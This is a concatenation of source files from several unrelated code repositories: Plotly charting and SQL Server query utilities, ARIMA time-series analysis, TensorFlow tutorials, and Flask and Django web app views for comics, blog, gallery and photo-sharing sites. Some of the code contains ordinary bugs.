x=list(range(df.shape[1])), # horizontal axis
y=list(range(df.shape[0])), # vertical axis
line_smoothing=0.85,
contours=dict(
showlabels=True, # show labels on contours
start=0,
end=18,
size=1)
))
fig.update_layout(title=title,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.index
),
xaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.columns,
tickangle=90,
tickfont=dict(size=9)
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=10))
fig.show()
def dl_ia_utils_plot_heatmap(df, title, x_label, y_label, x_ticks, y_ticks):
""" Plot heatmap
:df param: dataframe to plot
:title param: string with the title
:x_label param: string with the label of the x axis
:y_label param: string with the label of the y axis
:x_ticks param: list with the ticks of the x axis
:y_ticks param: list with the ticks of the y axis
:return:
"""
import plotly.express as px
import numpy as np
fig = px.imshow(df.values)
fig.update_layout(title=title,
yaxis_title=y_label,
xaxis_title=x_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(y_ticks)),
ticktext=y_ticks
),
xaxis=dict(
tickvals=np.arange(0, len(x_ticks)),
ticktext=x_ticks
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=11))
fig.show()
def dl_ia_utils_plot_timeseries_with_slider(df, var_x, var_y, title):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
mode='markers+lines',
marker=dict(color='red'),
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title=title,
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1d",
step="day",
stepmode="backward"),
dict(count=3,
label="3d",
step="day",
stepmode="backward"),
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\timeseries_with_slider_{}.html".format(var_y))
def dl_ia_utils_plot_timeseries(df, var_x, var_y, title_):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
marker=dict(color='red'),
mode='markers+lines',
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{}'.format(title_),
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}.html".format(title_, var_y))
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_two_timeseries : {} '.format(exception_msg))
error = 1
return error
def dl_ia_utils_plot_two_timeseries(df, var_x, var_y1, var_y2, title_, x_label, y_label):
"""
:param df:
:param var_x:
:param var_y1:
:param var_y2:
:return:
"""
import plotly.graph_objects as go
x_label = 'TIME (15 min)'
y_label = 'FLOW (veh./h)'
show = True
print_ = True
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
marker=dict(color='red'),
mode='markers',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
marker=dict(color='blue'),
y=df[var_y2],
mode='markers+lines',
name=var_y2))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label,
showlegend=True
)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1d",
step="day",
stepmode="backward"),
dict(count=3,
label="3d",
step="day",
stepmode="backward"),
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}_{}.html".format(title_, var_y1, var_y2))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_two_timeseries : {} '.format(exception_msg))
def dl_ia_utils_plot_line(df, var_x, var_y, var_group, title_):
"""
:param df:
:param var_x:
:param var_y:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
try:
fig = px.line(df,
x=var_x,
y=var_y,
color=var_group,
)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{}- {}'.format(title_, label))
fig.update_layout(showlegend=True)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}_{}.html".format(title_, var_x, var_y))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_two_timeseries : {} '.format(exception_msg))
def dl_ia_utils_plot_scatterplot_simple(df, var_x, var_y, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param variable_to_color: variable to use as color
:param variable_to_color: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot_simple: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot(df, var_x, var_y, var_color, var_size, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param variable_to_color: variable to use as color
:param variable_to_color: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
size=var_size,
color=var_color)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot: ' + str(exception_msg))
error = 1
return error
#############################################################
# --------------- DATA BASE ---------------------------------#
#############################################################
def dl_ia_query_get_data(query, ddbb_settings):
"""
this function perform the connection to the HORUS SQL serverdata base and executes the query provided
:param query: string with the query
:param ddbb_settings: List with DB connection settings (driver, server, database, schema,
user and pass)
:return error:
"""
import pyodbc
import pandas as pd
error = 0
try:
# print('define parameters')
# for a in db_settings_PRO.keys():
# print(a,':', db_settings_PRO[a])
### define conection to DDBB
driver = ddbb_settings['driver']
server = ddbb_settings['server']
database = ddbb_settings['database']
schema = ddbb_settings['schema']
user = ddbb_settings['user']
password = ddbb_settings['pass']
port = ddbb_settings['port']
except Exception as exception_msg:
print('(!) Error in dl_ia_conn_query_get_data: ' + str(exception_msg))
error = 1
df_input = []
return error, df_input
if error == 0:
try:
print(
'Loading data from server:[{}] database:[{}] schema:[{}] port : [{}] '.format(server, database, schema,
port))
### connect do DDBB and get last 6 hours od data
# sql_conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
# sql_conn = pyodbc.connect('DRIVER={SQL Server Native Client RDA 11.0};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
sql_conn_str = 'DRIVER={};SERVER={},{};DATABASE={};UID={};PWD={}'.format(driver, server, port, database,
user, password)
# print(sql_conn_str)
# sql_conn = pyodbc.connect('DRIVER=' + driver +';SERVER=' + server + ',' + port + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password)
sql_conn = pyodbc.connect(sql_conn_str)
df_input = pd.read_sql(query, sql_conn)
sql_conn.close()
return error, df_input
except Exception as exception_msg:
print('(!) Error in dl_ia_conn_query_get_data: ' + str(exception_msg))
error = 2
df_input = []
return error, df_input
def dl_ia_utils_initialize_engine(ddbb_settings):
""" Initialize an SQL ALchemy engine
:param ddbb_settings: DIctionary with driver user, pass, server, database, schema
:param engine:
"""
from sqlalchemy.engine import create_engine
try:
engine = create_engine("{}://{}:{}@{}:{}/{}".format(ddbb_settings['driver'],
ddbb_settings['user'],
ddbb_settings['pass'],
ddbb_settings['server'],
ddbb_settings['port'],
ddbb_settings['database']))
print('Engine successfully initialized')
return engine
except Exception as exception_msg:
print('(!) Error in dl_ia_conn_initialize_engine: {}'.format(exception_msg))
engine = []
return engine
def dl_ia_utils_query_get_data(query, ddbb_settings):
"""
this function perform the connection to the HORUS SQL serverdata base and executes the query provided
:param query: string with the query
:param ddbb_settings: List with DB connection settings (driver, server, database, schema,
user and pass)
:return error:
"""
import pyodbc
import pandas as pd
error = 0
try:
# print('define parameters')
# for a in db_settings_PRO.keys():
# print(a,':', db_settings_PRO[a])
### define conection to DDBB
driver = ddbb_settings['driver']
server = ddbb_settings['server']
database = ddbb_settings['database']
schema = ddbb_settings['schema']
user = ddbb_settings['user']
password = ddbb_settings['pass']
port = ddbb_settings['port']
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_query_get_data: ' + str(exception_msg))
error = 1
df_input = []
return error, df_input
if error == 0:
try:
print(
'Loading data from server:[{}] database:[{}] schema:[{}] port : [{}] '.format(server, database, schema,
port))
### connect do DDBB and get last 6 hours od data
# sql_conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
# sql_conn = pyodbc.connect('DRIVER={SQL Server Native Client RDA 11.0};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
sql_conn_str = 'DRIVER={};SERVER={},{};DATABASE={};UID={};PWD={}'.format(driver, server, port, database,
user, password)
# print(sql_conn_str)
# sql_conn = pyodbc.connect('DRIVER=' + driver +';SERVER=' + server + ',' + port + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password)
sql_conn = pyodbc.connect(sql_conn_str)
df_input = pd.read_sql(query, sql_conn)
sql_conn.close()
return error, df_input
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_query_get_data: ' + str(exception_msg))
error = 2
df_input = []
return error, df_input
#############################################################
# ------- MACHINE LEARNING ---------------------------------#
#############################################################
def dl_ia_utils_create_lagged_variables(df, variable, number_lags):
""" create lagged versions of the variable in a dataframe in which each row is an observation
:param df:
:param number_lags:
:return:
"""
number_lags = 23
for lag in range(1, number_lags + 1):
df[variable + '_lag_' + str(lag)] = df[variable].shift(lag)
# if you want numpy arrays with no null values:
df.dropna(inplace=True)
return df
def dl_ia_utils_anomaly_detection_univariate(df, variable):
""" Produce anomaly detection with forest isolation with univariate data
:param df:
:param variable:
"""
from sklearn.ensemble import IsolationForest
import numpy as np
import pandas as pd
error = 0
try:
# instantiate model
isolation_forest = IsolationForest(n_estimators=200)
# fit model
isolation_forest.fit(df[variable].values.reshape(-1, 1))
xx = np.linspace(df[variable].min(), df[variable].max(), len(df)).reshape(-1, 1)
anomaly_score = isolation_forest.decision_function(xx)
# make prediction
outlier = isolation_forest.predict(xx)
df_out = pd.DataFrame({'X': xx.T.ravel(), 'outlier': outlier.ravel(), 'anomaly_score': anomaly_score.ravel()})
lower_limit_outlier = df_out[df_out['outlier'] == -1]['X'].min()
upper_limit_outlier = df_out[df_out['outlier'] == -1]['X'].max()
print('lower limit outlier:{}'.format(lower_limit_outlier))
print('upper limit outlier:{}'.format(upper_limit_outlier))
return error, df_out
# plot
if 0 == 1:
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 4))
plt.plot(xx, anomaly_score, label='anomaly score')
plt.fill_between(xx.T[0],
np.min(anomaly_score),
np.max(anomaly_score),
where=outlier == -1,
color='r',
alpha=.4,
label='outlier region')
plt.legend()
plt.ylabel('anomaly score')
plt.xlabel('Sales')
plt.show();
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_anomaly_detection_univariate: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_variability_captured(y, y_hat):
""" function to calculate the varibility captured or explained variance
:param y:
:param y_hat:
:return:
"""
import numpy as np
return round(1 - np.var(y_hat - y) / np.var(y_hat), 3)
def dl_ia_utils_mape(y_true, y_pred):
""" function to calculate the Mean Absolute Percentage Error
Zero values are treated by vertical translation
:param y:
:param y_hat:
:return:
"""
import numpy as np
from IA_resources.dl_ia_utils import dl_ia_utils_vertical_translation
y_true = vertical_translation(y_true) # vertical translation +1
y_pred = vertical_translation(y_pred) # vertical translation +1
y_true, y_pred = np.array(y_true), np.array(y_pred)
return round(np.mean(np.abs((y_true - y_pred) / y_true)) * 100, 3)
def dl_ia_utils_regression_evaluation(y_hat, y):
""" Evaluate regression metrics
:param y_hat:
:param y:
:return:
"""
from IA_resources.dl_ia_utils import dl_ia_utils_variability_captured
from IA_resources.dl_ia_utils import dl_ia_utils_mape
from sklearn.metrics import r2_score, mean_absolute_error, explained_variance_score, mean_squared_error
R2 = round(r2_score(y_hat, y), 3)
MAE = round(mean_absolute_error(y_hat, y), 3)
MSE = round(mean_squared_error(y_hat, y), 3)
EV = round(explained_variance_score(y_hat, y), 3)
VC = round(dl_ia_utils_variability_captured(y_hat, y), 3)
errors = abs(y_hat - y)
# MAPE = 100 * np.mean(errors / y)
MAPE = dl_ia_utils_mape(y_hat, y)
accuracy = 100 - MAPE
print('Regression Metrics'.format(type))
print('R2 = {:0.2f}'.format(R2))
print('EV = {:0.2f}'.format(VC))
print('Variability = {:0.2f}'.format(EV))
print('MSE = {:0.2f}'.format(MSE))
print('MAE = {:0.2f}'.format(MAE))
print('MAPE: {:0.4f} %'.format(MAPE))
print('Accuracy = {:0.2f} %.'.format(accuracy))
return R2, MAE, MSE, EV, VC
``` |
{
"source": "joanvelro/repo_B",
"score": 3
} |
#### File: dataset_utils/data_profiling/arima_parameter_tunning.py
```python
import matplotlib.pyplot as plt
from numpy import log
from statsmodels.tsa.stattools import adfuller
from statsmodels.tsa.stattools import kpss
from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from statsmodels.tsa.seasonal import seasonal_decompose
import pandas as pd
from scipy import stats
def is_stationary_with_adf(data, significance_level=0.01):
"""Decide if the given time series is stationary using ADF test."""
X = data.values
result_test = adfuller(X, regression='c', autolag='BIC')
p_value = result_test[1]
adf_stats = result_test[0]
print("ADF p-value: {:0.5f}".format(p_value))
print("ADF Statistic: {:0.5f}".format(adf_stats))
print('Critical Values:')
for key, value in result_test[4].items():
print('\t%s: %.3f' % (key, value))
return p_value < significance_level
def is_stationary_with_kpss(data, significance_level=0.05):
"""Decide if the given time series is stationary using KPSS test."""
result_test = kpss(data, regression='c')
p_value = result_test[1]
kpss_stats = result_test[0]
print("KPSS p-value: {:0.5f}".format(p_value))
print("KPSS Statistic: {:0.5f}".format(kpss_stats))
print('Critical Values:')
for key, value in result_test[3].items():
print('\t%s: %.3f' % (key, value))
return p_value > significance_level
def is_stationary_visual_check(data, value, seasons, save_to=None):
seasonal_mean = data.rolling(window=seasons).mean()
seasonal_std = data.rolling(window=seasons).std()
fig, ax = plt.subplots(figsize=(18, 6))
data.plot(x="FECHA", y=value, ax=ax, label="observed", c='lightgrey')
seasonal_mean.plot(x="FECHA", y=value, ax=ax, label="seasonal (rolling) mean", c='red')
seasonal_std.plot(x="FECHA", y=value, ax=ax, label="seasonal (rolling) std", c='blue')
plt.legend(loc='best')
plt.title('Seasonal Mean & Standard Deviation')
if save_to is not None:
plt.savefig(save_to)
plt.show()
def correct_non_stationarities(data, seasons):
data['boxcox'], lmbda = stats.boxcox(data['TOTAL_VEHICULOS'])
data["fd"] = data.boxcox - data.boxcox.shift(1)
data["stationary"] = data.fd - data.fd.shift(seasons)
print("Stationary by ADF: {}".format(
"yes" if is_stationary_with_adf(data.stationary.dropna()) else "no"), '\n')
print("Stationary by KPSS: {}".format(
"yes" if is_stationary_with_kpss(data.stationary.dropna()) else "no"))
is_stationary_visual_check(data['stationary'], value="TOTAL_VEHICULOS", seasons=96)
fig, ax = plt.subplots(figsize=(18, 6))
ax = fig.add_subplot(211)
fig = plot_acf(data.stationary.dropna(inplace=False).iloc[seasons + 96:], lags=96, ax=ax)
ax = fig.add_subplot(212)
fig = plot_pacf(data.stationary.dropna(inplace=False).iloc[seasons + 1:], lags=96, ax=ax)
plt.show()
return data
def decomposition_time_series(data):
# Time series decomposition
decompfreq = 96 #
model = 'additive'
decomposition = seasonal_decompose(
data.interpolate("linear"),
freq=decompfreq,
model=model)
trend = decomposition.trend
seasonal = decomposition.seasonal
residual = decomposition.resid
fig, ax = plt.subplots(figsize=(18, 6))
data.plot(x="FECHA", y="TOTAL_VEHICULOS", ax=ax, label="observed", c='lightgrey')
trend.plot(ax=ax, label="trend")
plt.legend(loc='upper left')
fig, ax = plt.subplots(figsize=(18, 4))
seasonal.plot(ax=ax, label="seasonality")
plt.legend(loc='bottom left')
fig, ax = plt.subplots(figsize=(18, 4))
residual.plot(ax=ax, legend="residual")
plt.legend(loc='upper left')
plt.show()
def day_plot(data):
day_zoom_range = data[(data['FECHA'] >= '2019-01-24 00:00:00') & (data['FECHA'] < '2019-01-25 00:00:00')].index
fig, ax = plt.subplots(figsize=(18, 6))
data_zoomed = data.loc[day_zoom_range]
print("Data zoomed rows: " + str(data_zoomed.shape[0]))
data_zoomed.plot(x="FECHA", y="TOTAL_VEHICULOS", ax=ax, label="24-25 in zoom")
plt.legend(loc='upper left')
plt.show()
def plot_time_series(data):
fig, axs = plt.subplots(3, 1, constrained_layout=True)
axs[0].plot(data)
axs[0].set_title('subplot 1 - time series plot')
axs[0].set_xlabel('date (15min)')
axs[0].set_ylabel('total vehicles')
axs[1].hist(data)
axs[1].set_title('subplot 2 - histogram')
axs[1].set_xlabel('date (15min)')
axs[1].set_ylabel('total vehicles')
trans_data = log(data)
axs[2].plot(trans_data)
axs[2].set_title('subplot 3 - log transform time series plot')
axs[2].set_xlabel('date (15min)')
axs[2].set_ylabel('total vehicles')
plot_acf(data, lags=50)
plot_pacf(data, lags=50)
plt.show()
```
#### File: src/evaluation/evaluation_metrics.py
```python
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
from sklearn.metrics import r2_score
from sklearn.metrics import roc_auc_score
from math import sqrt
def mean_forecast_error_score(forecast, expected):
forecast_errors = [expected[i] - forecast[i] for i in range(len(expected))]
bias = sum(forecast_errors) * 1.0 / len(expected)
print('Bias: %f' % bias)
return bias
def mean_absolute_error_score(forecast, expected):
mae = mean_absolute_error(expected, forecast)
print('MAE: %f' % mae)
return mae
def mean_squared_error_score(forecast, expected):
mse = mean_squared_error(expected, forecast)
print('MSE: %f' % mse)
return mse
def root_mean_squared_error_score(forecast, expected):
if forecast.size==1:
mse=abs(expected-forecast)
else:
mse = mean_squared_error(expected, forecast)
rmse = sqrt(mse)
print('RMSE: %f' % rmse)
return rmse
def r2_metric_score(forecast, expected):
r2 = r2_score(expected, forecast)
print('R2: %f' % r2)
return r2
def roc_metric_score(forecast, expected):
roc = roc_auc_score(expected, forecast)
print('ROC: %f' % roc)
return roc
def ssr_metric_score(forecast, expected):
ssr = ((expected - forecast) ** 2).sum()
print('SSR: %f' % ssr)
return ssr
def sst_metric_score(forecast, expected):
sst = ((expected - expected.mean()) ** 2).sum()
print('SSR: %f' % sst)
return sst
```
#### File: repo_B/Test/Select_15_min.py
```python
import time
import os
def read_from_csv_(file):
fp = open(file, 'r')
names = fp.readline()
a = fp.readlines()
return a,names
def write_in_csv_(file,a,names,i):
fp = open(file, 'w')
fp.writelines(names)
fp.writelines(a[i:(i+20)])
fp.close()
def process_(entrada, salida, duerme):
a, nombres = read_from_csv_(entrada)
i = 0
while i < len(a):
write_in_csv_(salida, a, nombres, i)
i = i + 20
time.sleep(duerme)
os.remove(salida)
time.sleep(duerme)
print(i)
def process_stop(entrada, salida, duerme,iters):
a, nombres = read_from_csv_(entrada)
i = 0
lines = iters * 20 # num de lineas total a leer
while (i < len(a))&(i < lines):
write_in_csv_(salida, a, nombres, i)
i = i + 20
time.sleep(duerme)
os.remove(salida)
time.sleep(duerme)
print(i)
#duerme = 10 # segundos
#entrada = "D:\\Usuarios\mdbrenes\Documents\prueba\Predicciones Anual\enero18.csv"
#salida = "salidaTest.csv"
#process_(entrada,salida,duerme)
``` |
{
"source": "JoanVila03/ConversioImatges",
"score": 2
} |
#### File: JoanVila03/ConversioImatges/fitxers.py
```python
def escriu_capçelera(nom_fitxer):
with open(nom_fitxer, mode='w') as imatge:
imatge.write('P1\n')
imatge.write('3 3\n')
if __name__ == '__main__':
escriu_capçelera('imatge.pbm')
``` |
{
"source": "joanvila/tensorflow-training",
"score": 3
} |
#### File: joanvila/tensorflow-training/01_constant_nodes.py
```python
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main():
# Const node types
node1 = tf.constant(3.0, dtype=tf.float32)
node2 = tf.constant(4.0) # also tf.float32 implicitly
# The following print prints the nodes, not their value
print(node1, node2)
# To print the value we need to run the computational graph
sess = tf.Session()
print(sess.run([node1, node2]))
if __name__ == "__main__":
main()
```
#### File: joanvila/tensorflow-training/06_loss_function.py
```python
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main():
# The lost function calculates how far the current model is
# from the provided data
W = tf.Variable([.3], dtype=tf.float32)
b = tf.Variable([-.3], dtype=tf.float32)
x = tf.placeholder(tf.float32)
linear_model = W * x + b
# y is the placeholder of the desired values we expect from the regression
# linear_model - y is a vector which is element is the error delta
# square de error deltas is a typical loss model for linear regressions
y = tf.placeholder(tf.float32)
squared_deltas = tf.square(linear_model - y)
# We sum all the squared delta errors to create a single scalar
# for representing in an abstract way the error of all the examples
loss = tf.reduce_sum(squared_deltas)
sess = tf.Session()
# Variables must be always initialized
init = tf.global_variables_initializer()
sess.run(init) # Run the initialization
print(sess.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))
# By reassigning the W and b values to -1. and 1. the result would
# match the y vector so the final loss would be 0.0. This means
# we would have guessed the perfect values for W and b.
# However, the whole point of machine learning is to find those
# values automatically
if __name__ == "__main__":
main()
``` |
{
"source": "joanwanjiku/marvel-comics",
"score": 2
} |
#### File: marvel-comics/app/__init__.py
```python
from flask import Flask
from flask_bootstrap import Bootstrap
from config import config_options
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_uploads import IMAGES, UploadSet, configure_uploads
bootstrap = Bootstrap()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
db = SQLAlchemy()
photos = UploadSet('photos', IMAGES)
def create_app(config_name):
# initialize app
app = Flask(__name__, instance_relative_config=True)
# app configurations
app.config.from_object(config_options[config_name])
bootstrap.init_app(app)
db.init_app(app)
login_manager.init_app(app)
# register blueprint
from .main import main as main_bp
app.register_blueprint(main_bp)
from .auth import auth as auth_bp
app.register_blueprint(auth_bp)
configure_uploads(app, photos)
return app
```
#### File: app/main/views.py
```python
from flask import render_template, redirect, url_for,abort,request
from . import main
from flask_login import login_required,current_user
from ..models import User, Comment, Favourite
from .form import UpdateProfile
from .. import db,photos
from ..requests import get_characters, get_character_by_id, get_characters_by_name, get_comics_by_charid, get_all_comics, get_comic_by_id
from . import main
@main.route('/')
def index():
title= 'Home | Marvel'
return render_template('main/index.html')
@main.route('/characters')
def all_characters():
character_search = request.args.get('char_search')
if character_search:
return redirect(url_for('.search_result', char_name=character_search))
chars = get_characters()
return render_template('main/character.html', chars=chars)
@main.route('/comics')
def all_comics():
comics = get_all_comics()
title= 'Comics'
return render_template('main/comic.html', comics = comics, title=title)
@main.route('/results/<char_name>')
def search_result(char_name):
result = get_characters_by_name(char_name)[0]
return render_template('main/search_result.html', result=result)
@main.route('/<int:id>/comics')
def char_comics(id):
character_comics = get_comics_by_charid(id)
return render_template('main/character_comics.html', character_comics = character_comics)
@main.route('/char/<int:id>')
def each_char(id):
character = get_character_by_id(id)[0]
comments = Comment.get_all_comments(id)
title = character.get('name')
return render_template('main/each_char.html', character=character, comments=comments)
@main.route('/comic/<int:id>')
def each_comic(id):
comic = get_comic_by_id(id)[0]
title = 'Comc'
return render_template('main/each_comic.html', comic=comic, title=title)
@main.route('/user/<name>')
def profile(name):
user = User.query.filter_by(username = name).first()
print(user.id)
favourites = Favourite.get_favourites(user.id)
if user is None:
abort(404)
return render_template("profile/profile.html", user = user, favourites=favourites)
@main.route('/user/<name>/updateprofile', methods = ['POST','GET'])
@login_required
def updateprofile(name):
form = UpdateProfile()
user = User.query.filter_by(username = name).first()
if user == None:
abort(404)
if form.validate_on_submit():
user.bio = form.bio.data
user.save_u()
return redirect(url_for('main.profile',name = name))
return render_template('profile/update.html',form =form)
@main.route('/user/<name>/update/pic',methods= ['POST'])
@login_required
def update_pic(name):
user = User.query.filter_by(username = name).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',name=name))
@main.route('/char/<int:char_id>/comment', methods=['POST', 'GET'])
@login_required
def char_comment(char_id):
character = get_character_by_id(char_id)[0]
print(character.get('id'))
comments = Comment.get_all_comments(char_id)
if request.method== 'POST':
title = request.form['title']
content = request.form['content']
new_comment = Comment(
char_id = character.get('id'),
char_name = character.get('name'),
char_path = character.get('thumbnail').get('path'),
title = title,
content = content,
user=current_user
)
new_comment.save_comment()
return redirect(url_for('main.each_char', id = char_id))
return render_template('main/each_char.html', character=character, comments=comments)
@main.route('/char/<int:id>/favourite/')
@login_required
def favourite(id):
character = get_character_by_id(id)[0]
comments = Comment.get_all_comments(id)
fav_char = Favourite(
char_id = character.get('id'),
char_name = character.get('name'),
char_path = character.get('thumbnail').get('path'),
user = current_user
)
fav_char.save_fav()
return redirect(url_for('main.each_char', id=character.get('id')))
```
#### File: marvel-comics/tests/test_comic.py
```python
import unittest
from app.models import Comic
class TestComic(unittest.Testcase):
def setUp(self):
self.new_comic = Comic(1, 'marvel 2020', 'amazing looks',20, '/hsfhdhgd')
def test_instance(self)
self.assertTrue(isinstance(self.new_comic, Comic))
``` |
{
"source": "Joan-w/Blogpost",
"score": 3
} |
#### File: blog/main/routes.py
```python
import requests
from flask import render_template, request, Blueprint
from blog.models import Post
main = Blueprint('main', __name__)
@main.route('/')
@main.route('/home')
def home():
page = request.args.get('page', 1, type=int)
posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)
title = 'BlogHub'
return render_template('home.html', title=title, posts=posts)
@main.route('/quotes')
def quotes():
url = 'http://quotes.stormconsultancy.co.uk/random.json'
author = '<NAME>'
quote = 'In theory, theory and practice are the same. In practice, they\u2019re not.'
r = requests.get(url.format(author, quote)).json()
quotes = {
'author' : r['author'],
'quote' : r['quote'],
}
print(quotes)
return render_template('quotes.html', title='Random Quotes', quotes=quotes)
@main.route('/about')
def about():
return render_template('about.html')
``` |
{
"source": "Joan-w/gallery",
"score": 2
} |
#### File: gallery/gallery/tests.py
```python
from django.test import TestCase
from .models import Galleryimage, Location, ImageCategory
# Create your tests here.
class ImageTestCase(TestCase):
def setUp(self):
pass
#New picture
self.new_imagee = title='Image title', summary = 'Image summary')
self.new_picture.save()
#New location
self.new_location = Location(category='Laikipia')
self.new_location.save()
#New category
self.new_category = ImageCategory(category='food')
self.new_category.save()
def tearDown(self):
Galleryimage.objects.all().delete()
Location.objects.all().delete()
ImageCategory.objects.all().delete()
class LocationTestClass(TestCase):
'''
A test that checks the location of images
'''
def setUp(self):
pass
class ImageCategoryTestClass(TestCase):
'''
A test tthat checks the image categories
'''
def setUp(self):
pass
``` |
{
"source": "Joan-w/Insta-clone",
"score": 2
} |
#### File: Insta-clone/insta/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from .models import Post
from .forms import PostForm, UserRegisterForm, UserUpdateForm, ProfileUpdateForm
from django.views.generic import (
ListView,
CreateView,
DetailView,
UpdateView,
DeleteView,
)
# Create your views here.
class PostListView(ListView):
template_name = 'insta/home.html'
queryset = Post.objects.all().filter(created_date__lte=timezone.now()).order_by('-created_date')
context_object_name = 'posts'
class PostCreateView(LoginRequiredMixin, CreateView):
template_name = 'insta/post-create.html'
form_class = PostForm
queryset = Post.objects.all()
success_url = '/'
def form_valid(self, form):
print(form.cleaned_data)
form.instance.author = self.request.user
return super().form_valid(form)
class PostDetailView(DetailView):
model = Post
class PostUpdateView(LoginRequiredMixin, UpdateView):
model = Post
fields = ['image', ]
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
success_url = '/'
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
# messages.success(request, 'Your account has been created . You can now log in!')
return redirect('login')
else:
